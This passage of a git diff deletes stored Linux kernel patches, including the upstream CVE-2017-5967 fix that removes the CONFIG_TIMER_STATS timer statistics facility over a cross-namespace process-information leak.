-RnJvbSA2M2Q0MWZiMmIxMDFmZjBiZDc4NmRlYWIzYzYwMTE0ZDM4ZDQ3MDQ4IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBDaHJpc3RvcGhlciBSLiBQYWxtZXIgPGNycGFsbWVyQGdtYWlsLmNvbT4KRGF0ZTogU2F0LCAyOSBBcHIgMjAxNyAwNjo0NDoxNCAtMDQwMApTdWJqZWN0OiBbUEFUQ0hdIHBtZTogZGVmY29uZmlnOiBSZW1vdmUgQ09ORklHX1RJTUVSX1NUQVRTCgpDaGFuZ2UtSWQ6IEliNGM4ODM5M2VjY2M3MGU5OThmM2E3ZGNjOWY5YTRkZTUyMzA3MzVjCi0tLQoKZGlmZiAtLWdpdCBhL2FyY2gvYXJtNjQvY29uZmlncy9wbWVfZGVmY29uZmlnIGIvYXJjaC9hcm02NC9jb25maWdzL3BtZV9kZWZjb25maWcKaW5kZXggYjE0NWJiNi4uNmFkODgxOCAxMDA2NDQKLS0tIGEvYXJjaC9hcm02NC9jb25maWdzL3BtZV9kZWZjb25maWcKKysrIGIvYXJjaC9hcm02NC9jb25maWdzL3BtZV9kZWZjb25maWcKQEAgLTQ0MTQsNyArNDQxNCw2IEBACiAjIENPTkZJR19QQU5JQ19PTl9SVF9USFJPVFRMSU5HIGlzIG5vdCBzZXQKICMgQ09ORklHX1NDSEVEU1RBVFMgaXMgbm90IHNldAogIyBDT05GSUdfU0NIRURfU1RBQ0tfRU5EX0NIRUNLIGlzIG5vdCBzZXQKLUNPTkZJR19USU1FUl9TVEFUUz15CiAjIENPTkZJR19ERUJVR19NT0RVTEVfU0NBTl9PRkYgaXMgbm90IHNldAogIyBDT05GSUdfREVCVUdfVEFTS19TVEFDS19TQ0FOX09GRiBpcyBub3Qgc2V0CiAjIENPTkZJR19ERUJVR19QUkVFTVBUIGlzIG5vdCBzZXQK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/^4.9/0003.patch b/Patches/Linux_CVEs/CVE-2017-5967/^4.9/0003.patch
deleted file mode 100644
index b7bd1067..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/^4.9/0003.patch
+++ /dev/null
@@ -1,939 +0,0 @@
-From dfb4357da6ddbdf57d583ba64361c9d792b0e0b1 Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Wed, 8 Feb 2017 11:26:59 -0800
-Subject: time: Remove CONFIG_TIMER_STATS
-
-Currently CONFIG_TIMER_STATS exposes process information across namespaces:
-
-kernel/time/timer_list.c print_timer():
-
-        SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
-
-/proc/timer_list:
-
- #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
-
-Given that the tracer can give the same information, this patch entirely
-removes CONFIG_TIMER_STATS.
-
-Suggested-by: Thomas Gleixner <tglx@linutronix.de>
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Acked-by: John Stultz <john.stultz@linaro.org>
-Cc: Nicolas Pitre <nicolas.pitre@linaro.org>
-Cc: linux-doc@vger.kernel.org
-Cc: Lai Jiangshan <jiangshanlai@gmail.com>
-Cc: Shuah Khan <shuah@kernel.org>
-Cc: Xing Gao <xgao01@email.wm.edu>
-Cc: Jonathan Corbet <corbet@lwn.net>
-Cc: Jessica Frazelle <me@jessfraz.com>
-Cc: kernel-hardening@lists.openwall.com
-Cc: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
-Cc: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
-Cc: Petr Mladek <pmladek@suse.com>
-Cc: Richard Cochran <richardcochran@gmail.com>
-Cc: Tejun Heo <tj@kernel.org>
-Cc: Michal Marek <mmarek@suse.com>
-Cc: Josh Poimboeuf <jpoimboe@redhat.com>
-Cc: Dmitry Vyukov <dvyukov@google.com>
-Cc: Oleg Nesterov <oleg@redhat.com>
-Cc: "Eric W. Biederman" <ebiederm@xmission.com>
-Cc: Olof Johansson <olof@lixom.net>
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: linux-api@vger.kernel.org
-Cc: Arjan van de Ven <arjan@linux.intel.com>
-Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
----
- Documentation/timers/timer_stats.txt |  73 ------
- include/linux/hrtimer.h              |  11 -
- include/linux/timer.h                |  45 ----
- kernel/kthread.c                     |   1 -
- kernel/time/Makefile                 |   1 -
- kernel/time/hrtimer.c                |  38 ----
- kernel/time/timer.c                  |  48 +---
- kernel/time/timer_list.c             |  10 -
- kernel/time/timer_stats.c            | 425 -----------------------------------
- kernel/workqueue.c                   |   2 -
- lib/Kconfig.debug                    |  14 --
- 11 files changed, 2 insertions(+), 666 deletions(-)
- delete mode 100644 Documentation/timers/timer_stats.txt
- delete mode 100644 kernel/time/timer_stats.c
-
-diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt
-deleted file mode 100644
-index de835ee..0000000
---- a/Documentation/timers/timer_stats.txt
-+++ /dev/null
-@@ -1,73 +0,0 @@
--timer_stats - timer usage statistics
--------------------------------------
--
--timer_stats is a debugging facility to make the timer (ab)usage in a Linux
--system visible to kernel and userspace developers. If enabled in the config
--but not used it has almost zero runtime overhead, and a relatively small
--data structure overhead. Even if collection is enabled runtime all the
--locking is per-CPU and lookup is hashed.
--
--timer_stats should be used by kernel and userspace developers to verify that
--their code does not make unduly use of timers. This helps to avoid unnecessary
--wakeups, which should be avoided to optimize power consumption.
--
--It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration
--section.
--
--timer_stats collects information about the timer events which are fired in a
--Linux system over a sample period:
--
--- the pid of the task(process) which initialized the timer
--- the name of the process which initialized the timer
--- the function where the timer was initialized
--- the callback function which is associated to the timer
--- the number of events (callbacks)
--
--timer_stats adds an entry to /proc: /proc/timer_stats
--
--This entry is used to control the statistics functionality and to read out the
--sampled information.
--
--The timer_stats functionality is inactive on bootup.
--
--To activate a sample period issue:
--# echo 1 >/proc/timer_stats
--
--To stop a sample period issue:
--# echo 0 >/proc/timer_stats
--
--The statistics can be retrieved by:
--# cat /proc/timer_stats
--
--While sampling is enabled, each readout from /proc/timer_stats will see
--newly updated statistics. Once sampling is disabled, the sampled information
--is kept until a new sample period is started. This allows multiple readouts.
--
--Sample output of /proc/timer_stats:
--
--Timerstats sample period: 3.888770 s
--  12,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  15,     1 swapper          hcd_submit_urb (rh_timer_func)
--   4,   959 kedac            schedule_timeout (process_timeout)
--   1,     0 swapper          page_writeback_init (wb_timer_fn)
--  28,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  22,  2948 IRQ 4            tty_flip_buffer_push (delayed_work_timer_fn)
--   3,  3100 bash             schedule_timeout (process_timeout)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          neigh_table_init_no_netlink (neigh_periodic_timer)
--   1,  2292 ip               __netdev_watchdog_up (dev_watchdog)
--   1,    23 events/1         do_cache_clean (delayed_work_timer_fn)
--90 total events, 30.0 events/sec
--
--The first column is the number of events, the second column the pid, the third
--column is the name of the process. The forth column shows the function which
--initialized the timer and in parenthesis the callback function which was
--executed on expiry.
--
--    Thomas, Ingo
--
--Added flag to indicate 'deferrable timer' in /proc/timer_stats. A deferrable
--timer will appear as follows
--  10D,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--
-diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
-index cdab81b..e52b427 100644
---- a/include/linux/hrtimer.h
-+++ b/include/linux/hrtimer.h
-@@ -88,12 +88,6 @@ enum hrtimer_restart {
-  * @base:	pointer to the timer base (per cpu and per clock)
-  * @state:	state information (See bit values above)
-  * @is_rel:	Set if the timer was armed relative
-- * @start_pid:  timer statistics field to store the pid of the task which
-- *		started the timer
-- * @start_site:	timer statistics field to store the site where the timer
-- *		was started
-- * @start_comm: timer statistics field to store the name of the process which
-- *		started the timer
-  *
-  * The hrtimer structure must be initialized by hrtimer_init()
-  */
-@@ -104,11 +98,6 @@ struct hrtimer {
- 	struct hrtimer_clock_base	*base;
- 	u8				state;
- 	u8				is_rel;
--#ifdef CONFIG_TIMER_STATS
--	int				start_pid;
--	void				*start_site;
--	char				start_comm[16];
--#endif
- };
- 
- /**
-diff --git a/include/linux/timer.h b/include/linux/timer.h
-index 51d601f..5a209b8 100644
---- a/include/linux/timer.h
-+++ b/include/linux/timer.h
-@@ -20,11 +20,6 @@ struct timer_list {
- 	unsigned long		data;
- 	u32			flags;
- 
--#ifdef CONFIG_TIMER_STATS
--	int			start_pid;
--	void			*start_site;
--	char			start_comm[16];
--#endif
- #ifdef CONFIG_LOCKDEP
- 	struct lockdep_map	lockdep_map;
- #endif
-@@ -197,46 +192,6 @@ extern int mod_timer_pending(struct timer_list *timer, unsigned long expires);
-  */
- #define NEXT_TIMER_MAX_DELTA	((1UL << 30) - 1)
- 
--/*
-- * Timer-statistics info:
-- */
--#ifdef CONFIG_TIMER_STATS
--
--extern int timer_stats_active;
--
--extern void init_timer_stats(void);
--
--extern void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--				     void *timerf, char *comm, u32 flags);
--
--extern void __timer_stats_timer_set_start_info(struct timer_list *timer,
--					       void *addr);
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--	if (likely(!timer_stats_active))
--		return;
--	__timer_stats_timer_set_start_info(timer, __builtin_return_address(0));
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--	timer->start_site = NULL;
--}
--#else
--static inline void init_timer_stats(void)
--{
--}
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--}
--#endif
--
- extern void add_timer(struct timer_list *timer);
- 
- extern int try_to_del_timer_sync(struct timer_list *timer);
-diff --git a/kernel/kthread.c b/kernel/kthread.c
-index 2318fba..8461a43 100644
---- a/kernel/kthread.c
-+++ b/kernel/kthread.c
-@@ -850,7 +850,6 @@ void __kthread_queue_delayed_work(struct kthread_worker *worker,
- 
- 	list_add(&work->node, &worker->delayed_work_list);
- 	work->worker = worker;
--	timer_stats_timer_set_start_info(&dwork->timer);
- 	timer->expires = jiffies + delay;
- 	add_timer(timer);
- }
-diff --git a/kernel/time/Makefile b/kernel/time/Makefile
-index 976840d..938dbf3 100644
---- a/kernel/time/Makefile
-+++ b/kernel/time/Makefile
-@@ -15,6 +15,5 @@ ifeq ($(CONFIG_GENERIC_CLOCKEVENTS_BROADCAST),y)
- endif
- obj-$(CONFIG_GENERIC_SCHED_CLOCK)		+= sched_clock.o
- obj-$(CONFIG_TICK_ONESHOT)			+= tick-oneshot.o tick-sched.o
--obj-$(CONFIG_TIMER_STATS)			+= timer_stats.o
- obj-$(CONFIG_DEBUG_FS)				+= timekeeping_debug.o
- obj-$(CONFIG_TEST_UDELAY)			+= test_udelay.o
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index c6ecedd..edabde6 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -766,34 +766,6 @@ void hrtimers_resume(void)
- 	clock_was_set_delayed();
- }
- 
--static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (timer->start_site)
--		return;
--	timer->start_site = __builtin_return_address(0);
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--#endif
--}
--
--static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--#endif
--}
--
--static inline void timer_stats_account_hrtimer(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (likely(!timer_stats_active))
--		return;
--	timer_stats_update_stats(timer, timer->start_pid, timer->start_site,
--				 timer->function, timer->start_comm, 0);
--#endif
--}
--
- /*
-  * Counterpart to lock_hrtimer_base above:
-  */
-@@ -932,7 +904,6 @@ remove_hrtimer(struct hrtimer *timer, struct hrtimer_clock_base *base, bool rest
- 		 * rare case and less expensive than a smp call.
- 		 */
- 		debug_deactivate(timer);
--		timer_stats_hrtimer_clear_start_info(timer);
- 		reprogram = base->cpu_base == this_cpu_ptr(&hrtimer_bases);
- 
- 		if (!restart)
-@@ -990,8 +961,6 @@ void hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
- 	/* Switch the timer base, if necessary: */
- 	new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED);
- 
--	timer_stats_hrtimer_set_start_info(timer);
--
- 	leftmost = enqueue_hrtimer(timer, new_base);
- 	if (!leftmost)
- 		goto unlock;
-@@ -1128,12 +1097,6 @@ static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id,
- 	base = hrtimer_clockid_to_base(clock_id);
- 	timer->base = &cpu_base->clock_base[base];
- 	timerqueue_init(&timer->node);
--
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- }
- 
- /**
-@@ -1217,7 +1180,6 @@ static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
- 	raw_write_seqcount_barrier(&cpu_base->seq);
- 
- 	__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
--	timer_stats_account_hrtimer(timer);
- 	fn = timer->function;
- 
- 	/*
-diff --git a/kernel/time/timer.c b/kernel/time/timer.c
-index ec33a69..82a6bfa 100644
---- a/kernel/time/timer.c
-+++ b/kernel/time/timer.c
-@@ -571,38 +571,6 @@ internal_add_timer(struct timer_base *base, struct timer_list *timer)
- 	trigger_dyntick_cpu(base, timer);
- }
- 
--#ifdef CONFIG_TIMER_STATS
--void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr)
--{
--	if (timer->start_site)
--		return;
--
--	timer->start_site = addr;
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--}
--
--static void timer_stats_account_timer(struct timer_list *timer)
--{
--	void *site;
--
--	/*
--	 * start_site can be concurrently reset by
--	 * timer_stats_timer_clear_start_info()
--	 */
--	site = READ_ONCE(timer->start_site);
--	if (likely(!site))
--		return;
--
--	timer_stats_update_stats(timer, timer->start_pid, site,
--				 timer->function, timer->start_comm,
--				 timer->flags);
--}
--
--#else
--static void timer_stats_account_timer(struct timer_list *timer) {}
--#endif
--
- #ifdef CONFIG_DEBUG_OBJECTS_TIMERS
- 
- static struct debug_obj_descr timer_debug_descr;
-@@ -789,11 +757,6 @@ static void do_init_timer(struct timer_list *timer, unsigned int flags,
- {
- 	timer->entry.pprev = NULL;
- 	timer->flags = flags | raw_smp_processor_id();
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- 	lockdep_init_map(&timer->lockdep_map, name, key, 0);
- }
- 
-@@ -1001,8 +964,6 @@ __mod_timer(struct timer_list *timer, unsigned long expires, bool pending_only)
- 		base = lock_timer_base(timer, &flags);
- 	}
- 
--	timer_stats_timer_set_start_info(timer);
--
- 	ret = detach_if_pending(timer, base, false);
- 	if (!ret && pending_only)
- 		goto out_unlock;
-@@ -1130,7 +1091,6 @@ void add_timer_on(struct timer_list *timer, int cpu)
- 	struct timer_base *new_base, *base;
- 	unsigned long flags;
- 
--	timer_stats_timer_set_start_info(timer);
- 	BUG_ON(timer_pending(timer) || !timer->function);
- 
- 	new_base = get_timer_cpu_base(timer->flags, cpu);
-@@ -1176,7 +1136,6 @@ int del_timer(struct timer_list *timer)
- 
- 	debug_assert_init(timer);
- 
--	timer_stats_timer_clear_start_info(timer);
- 	if (timer_pending(timer)) {
- 		base = lock_timer_base(timer, &flags);
- 		ret = detach_if_pending(timer, base, true);
-@@ -1204,10 +1163,9 @@ int try_to_del_timer_sync(struct timer_list *timer)
- 
- 	base = lock_timer_base(timer, &flags);
- 
--	if (base->running_timer != timer) {
--		timer_stats_timer_clear_start_info(timer);
-+	if (base->running_timer != timer)
- 		ret = detach_if_pending(timer, base, true);
--	}
-+
- 	spin_unlock_irqrestore(&base->lock, flags);
- 
- 	return ret;
-@@ -1331,7 +1289,6 @@ static void expire_timers(struct timer_base *base, struct hlist_head *head)
- 		unsigned long data;
- 
- 		timer = hlist_entry(head->first, struct timer_list, entry);
--		timer_stats_account_timer(timer);
- 
- 		base->running_timer = timer;
- 		detach_timer(timer, true);
-@@ -1868,7 +1825,6 @@ static void __init init_timer_cpus(void)
- void __init init_timers(void)
- {
- 	init_timer_cpus();
--	init_timer_stats();
- 	open_softirq(TIMER_SOFTIRQ, run_timer_softirq);
- }
- 
-diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c
-index afe6cd1..387a3a5 100644
---- a/kernel/time/timer_list.c
-+++ b/kernel/time/timer_list.c
-@@ -62,21 +62,11 @@ static void
- print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer,
- 	    int idx, u64 now)
- {
--#ifdef CONFIG_TIMER_STATS
--	char tmp[TASK_COMM_LEN + 1];
--#endif
- 	SEQ_printf(m, " #%d: ", idx);
- 	print_name_offset(m, taddr);
- 	SEQ_printf(m, ", ");
- 	print_name_offset(m, timer->function);
- 	SEQ_printf(m, ", S:%02x", timer->state);
--#ifdef CONFIG_TIMER_STATS
--	SEQ_printf(m, ", ");
--	print_name_offset(m, timer->start_site);
--	memcpy(tmp, timer->start_comm, TASK_COMM_LEN);
--	tmp[TASK_COMM_LEN] = 0;
--	SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
--#endif
- 	SEQ_printf(m, "\n");
- 	SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n",
- 		(unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)),
-diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c
-deleted file mode 100644
-index afddded..0000000
---- a/kernel/time/timer_stats.c
-+++ /dev/null
-@@ -1,425 +0,0 @@
--/*
-- * kernel/time/timer_stats.c
-- *
-- * Collect timer usage statistics.
-- *
-- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar
-- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner <tglx@timesys.com>
-- *
-- * timer_stats is based on timer_top, a similar functionality which was part of
-- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the
-- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based
-- * on dynamic allocation of the statistics entries and linear search based
-- * lookup combined with a global lock, rather than the static array, hash
-- * and per-CPU locking which is used by timer_stats. It was written for the
-- * pre hrtimer kernel code and therefore did not take hrtimers into account.
-- * Nevertheless it provided the base for the timer_stats implementation and
-- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks
-- * for this effort.
-- *
-- * timer_top.c is
-- *	Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus
-- *	Written by Daniel Petrini <d.pensator@gmail.com>
-- *	timer_top.c was released under the GNU General Public License version 2
-- *
-- * We export the addresses and counting of timer functions being called,
-- * the pid and cmdline from the owner process if applicable.
-- *
-- * Start/stop data collection:
-- * # echo [1|0] >/proc/timer_stats
-- *
-- * Display the information collected so far:
-- * # cat /proc/timer_stats
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 as
-- * published by the Free Software Foundation.
-- */
--
--#include <linux/proc_fs.h>
--#include <linux/module.h>
--#include <linux/spinlock.h>
--#include <linux/sched.h>
--#include <linux/seq_file.h>
--#include <linux/kallsyms.h>
--
--#include <linux/uaccess.h>
--
--/*
-- * This is our basic unit of interest: a timer expiry event identified
-- * by the timer, its start/expire functions and the PID of the task that
-- * started the timer. We count the number of times an event happens:
-- */
--struct entry {
--	/*
--	 * Hash list:
--	 */
--	struct entry		*next;
--
--	/*
--	 * Hash keys:
--	 */
--	void			*timer;
--	void			*start_func;
--	void			*expire_func;
--	pid_t			pid;
--
--	/*
--	 * Number of timeout events:
--	 */
--	unsigned long		count;
--	u32			flags;
--
--	/*
--	 * We save the command-line string to preserve
--	 * this information past task exit:
--	 */
--	char			comm[TASK_COMM_LEN + 1];
--
--} ____cacheline_aligned_in_smp;
--
--/*
-- * Spinlock protecting the tables - not taken during lookup:
-- */
--static DEFINE_RAW_SPINLOCK(table_lock);
--
--/*
-- * Per-CPU lookup locks for fast hash lookup:
-- */
--static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock);
--
--/*
-- * Mutex to serialize state changes with show-stats activities:
-- */
--static DEFINE_MUTEX(show_mutex);
--
--/*
-- * Collection status, active/inactive:
-- */
--int __read_mostly timer_stats_active;
--
--/*
-- * Beginning/end timestamps of measurement:
-- */
--static ktime_t time_start, time_stop;
--
--/*
-- * tstat entry structs only get allocated while collection is
-- * active and never freed during that time - this simplifies
-- * things quite a bit.
-- *
-- * They get freed when a new collection period is started.
-- */
--#define MAX_ENTRIES_BITS	10
--#define MAX_ENTRIES		(1UL << MAX_ENTRIES_BITS)
--
--static unsigned long nr_entries;
--static struct entry entries[MAX_ENTRIES];
--
--static atomic_t overflow_count;
--
--/*
-- * The entries are in a hash-table, for fast lookup:
-- */
--#define TSTAT_HASH_BITS		(MAX_ENTRIES_BITS - 1)
--#define TSTAT_HASH_SIZE		(1UL << TSTAT_HASH_BITS)
--#define TSTAT_HASH_MASK		(TSTAT_HASH_SIZE - 1)
--
--#define __tstat_hashfn(entry)						\
--	(((unsigned long)(entry)->timer       ^				\
--	  (unsigned long)(entry)->start_func  ^				\
--	  (unsigned long)(entry)->expire_func ^				\
--	  (unsigned long)(entry)->pid		) & TSTAT_HASH_MASK)
--
--#define tstat_hashentry(entry)	(tstat_hash_table + __tstat_hashfn(entry))
--
--static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly;
--
--static void reset_entries(void)
--{
--	nr_entries = 0;
--	memset(entries, 0, sizeof(entries));
--	memset(tstat_hash_table, 0, sizeof(tstat_hash_table));
--	atomic_set(&overflow_count, 0);
--}
--
--static struct entry *alloc_entry(void)
--{
--	if (nr_entries >= MAX_ENTRIES)
--		return NULL;
--
--	return entries + nr_entries++;
--}
--
--static int match_entries(struct entry *entry1, struct entry *entry2)
--{
--	return entry1->timer       == entry2->timer	  &&
--	       entry1->start_func  == entry2->start_func  &&
--	       entry1->expire_func == entry2->expire_func &&
--	       entry1->pid	   == entry2->pid;
--}
--
--/*
-- * Look up whether an entry matching this item is present
-- * in the hash already. Must be called with irqs off and the
-- * lookup lock held:
-- */
--static struct entry *tstat_lookup(struct entry *entry, char *comm)
--{
--	struct entry **head, *curr, *prev;
--
--	head = tstat_hashentry(entry);
--	curr = *head;
--
--	/*
--	 * The fastpath is when the entry is already hashed,
--	 * we do this with the lookup lock held, but with the
--	 * table lock not held:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			return curr;
--
--		curr = curr->next;
--	}
--	/*
--	 * Slowpath: allocate, set up and link a new hash entry:
--	 */
--	prev = NULL;
--	curr = *head;
--
--	raw_spin_lock(&table_lock);
--	/*
--	 * Make sure we have not raced with another CPU:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			goto out_unlock;
--
--		prev = curr;
--		curr = curr->next;
--	}
--
--	curr = alloc_entry();
--	if (curr) {
--		*curr = *entry;
--		curr->count = 0;
--		curr->next = NULL;
--		memcpy(curr->comm, comm, TASK_COMM_LEN);
--
--		smp_mb(); /* Ensure that curr is initialized before insert */
--
--		if (prev)
--			prev->next = curr;
--		else
--			*head = curr;
--	}
-- out_unlock:
--	raw_spin_unlock(&table_lock);
--
--	return curr;
--}
--
--/**
-- * timer_stats_update_stats - Update the statistics for a timer.
-- * @timer:	pointer to either a timer_list or a hrtimer
-- * @pid:	the pid of the task which set up the timer
-- * @startf:	pointer to the function which did the timer setup
-- * @timerf:	pointer to the timer callback function of the timer
-- * @comm:	name of the process which set up the timer
-- * @tflags:	The flags field of the timer
-- *
-- * When the timer is already registered, then the event counter is
-- * incremented. Otherwise the timer is registered in a free slot.
-- */
--void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--			      void *timerf, char *comm, u32 tflags)
--{
--	/*
--	 * It doesn't matter which lock we take:
--	 */
--	raw_spinlock_t *lock;
--	struct entry *entry, input;
--	unsigned long flags;
--
--	if (likely(!timer_stats_active))
--		return;
--
--	lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id());
--
--	input.timer = timer;
--	input.start_func = startf;
--	input.expire_func = timerf;
--	input.pid = pid;
--	input.flags = tflags;
--
--	raw_spin_lock_irqsave(lock, flags);
--	if (!timer_stats_active)
--		goto out_unlock;
--
--	entry = tstat_lookup(&input, comm);
--	if (likely(entry))
--		entry->count++;
--	else
--		atomic_inc(&overflow_count);
--
-- out_unlock:
--	raw_spin_unlock_irqrestore(lock, flags);
--}
--
--static void print_name_offset(struct seq_file *m, unsigned long addr)
--{
--	char symname[KSYM_NAME_LEN];
--
--	if (lookup_symbol_name(addr, symname) < 0)
--		seq_printf(m, "<%p>", (void *)addr);
--	else
--		seq_printf(m, "%s", symname);
--}
--
--static int tstats_show(struct seq_file *m, void *v)
--{
--	struct timespec64 period;
--	struct entry *entry;
--	unsigned long ms;
--	long events = 0;
--	ktime_t time;
--	int i;
--
--	mutex_lock(&show_mutex);
--	/*
--	 * If still active then calculate up to now:
--	 */
--	if (timer_stats_active)
--		time_stop = ktime_get();
--
--	time = ktime_sub(time_stop, time_start);
--
--	period = ktime_to_timespec64(time);
--	ms = period.tv_nsec / 1000000;
--
--	seq_puts(m, "Timer Stats Version: v0.3\n");
--	seq_printf(m, "Sample period: %ld.%03ld s\n", (long)period.tv_sec, ms);
--	if (atomic_read(&overflow_count))
--		seq_printf(m, "Overflow: %d entries\n", atomic_read(&overflow_count));
--	seq_printf(m, "Collection: %s\n", timer_stats_active ? "active" : "inactive");
--
--	for (i = 0; i < nr_entries; i++) {
--		entry = entries + i;
--		if (entry->flags & TIMER_DEFERRABLE) {
--			seq_printf(m, "%4luD, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		} else {
--			seq_printf(m, " %4lu, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		}
--
--		print_name_offset(m, (unsigned long)entry->start_func);
--		seq_puts(m, " (");
--		print_name_offset(m, (unsigned long)entry->expire_func);
--		seq_puts(m, ")\n");
--
--		events += entry->count;
--	}
--
--	ms += period.tv_sec * 1000;
--	if (!ms)
--		ms = 1;
--
--	if (events && period.tv_sec)
--		seq_printf(m, "%ld total events, %ld.%03ld events/sec\n",
--			   events, events * 1000 / ms,
--			   (events * 1000000 / ms) % 1000);
--	else
--		seq_printf(m, "%ld total events\n", events);
--
--	mutex_unlock(&show_mutex);
--
--	return 0;
--}
--
--/*
-- * After a state change, make sure all concurrent lookup/update
-- * activities have stopped:
-- */
--static void sync_access(void)
--{
--	unsigned long flags;
--	int cpu;
--
--	for_each_online_cpu(cpu) {
--		raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu);
--
--		raw_spin_lock_irqsave(lock, flags);
--		/* nothing */
--		raw_spin_unlock_irqrestore(lock, flags);
--	}
--}
--
--static ssize_t tstats_write(struct file *file, const char __user *buf,
--			    size_t count, loff_t *offs)
--{
--	char ctl[2];
--
--	if (count != 2 || *offs)
--		return -EINVAL;
--
--	if (copy_from_user(ctl, buf, count))
--		return -EFAULT;
--
--	mutex_lock(&show_mutex);
--	switch (ctl[0]) {
--	case '0':
--		if (timer_stats_active) {
--			timer_stats_active = 0;
--			time_stop = ktime_get();
--			sync_access();
--		}
--		break;
--	case '1':
--		if (!timer_stats_active) {
--			reset_entries();
--			time_start = ktime_get();
--			smp_mb();
--			timer_stats_active = 1;
--		}
--		break;
--	default:
--		count = -EINVAL;
--	}
--	mutex_unlock(&show_mutex);
--
--	return count;
--}
--
--static int tstats_open(struct inode *inode, struct file *filp)
--{
--	return single_open(filp, tstats_show, NULL);
--}
--
--static const struct file_operations tstats_fops = {
--	.open		= tstats_open,
--	.read		= seq_read,
--	.write		= tstats_write,
--	.llseek		= seq_lseek,
--	.release	= single_release,
--};
--
--void __init init_timer_stats(void)
--{
--	int cpu;
--
--	for_each_possible_cpu(cpu)
--		raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu));
--}
--
--static int __init init_tstats_procfs(void)
--{
--	struct proc_dir_entry *pe;
--
--	pe = proc_create("timer_stats", 0644, NULL, &tstats_fops);
--	if (!pe)
--		return -ENOMEM;
--	return 0;
--}
--__initcall(init_tstats_procfs);
-diff --git a/kernel/workqueue.c b/kernel/workqueue.c
-index 1d9fb65..072cbc9 100644
---- a/kernel/workqueue.c
-+++ b/kernel/workqueue.c
-@@ -1523,8 +1523,6 @@ static void __queue_delayed_work(int cpu, struct workqueue_struct *wq,
- 		return;
- 	}
- 
--	timer_stats_timer_set_start_info(&dwork->timer);
--
- 	dwork->wq = wq;
- 	dwork->cpu = cpu;
- 	timer->expires = jiffies + delay;
-diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
-index eb9e9a7..132af33 100644
---- a/lib/Kconfig.debug
-+++ b/lib/Kconfig.debug
-@@ -980,20 +980,6 @@ config DEBUG_TIMEKEEPING
- 
- 	  If unsure, say N.
- 
--config TIMER_STATS
--	bool "Collect kernel timers statistics"
--	depends on DEBUG_KERNEL && PROC_FS
--	help
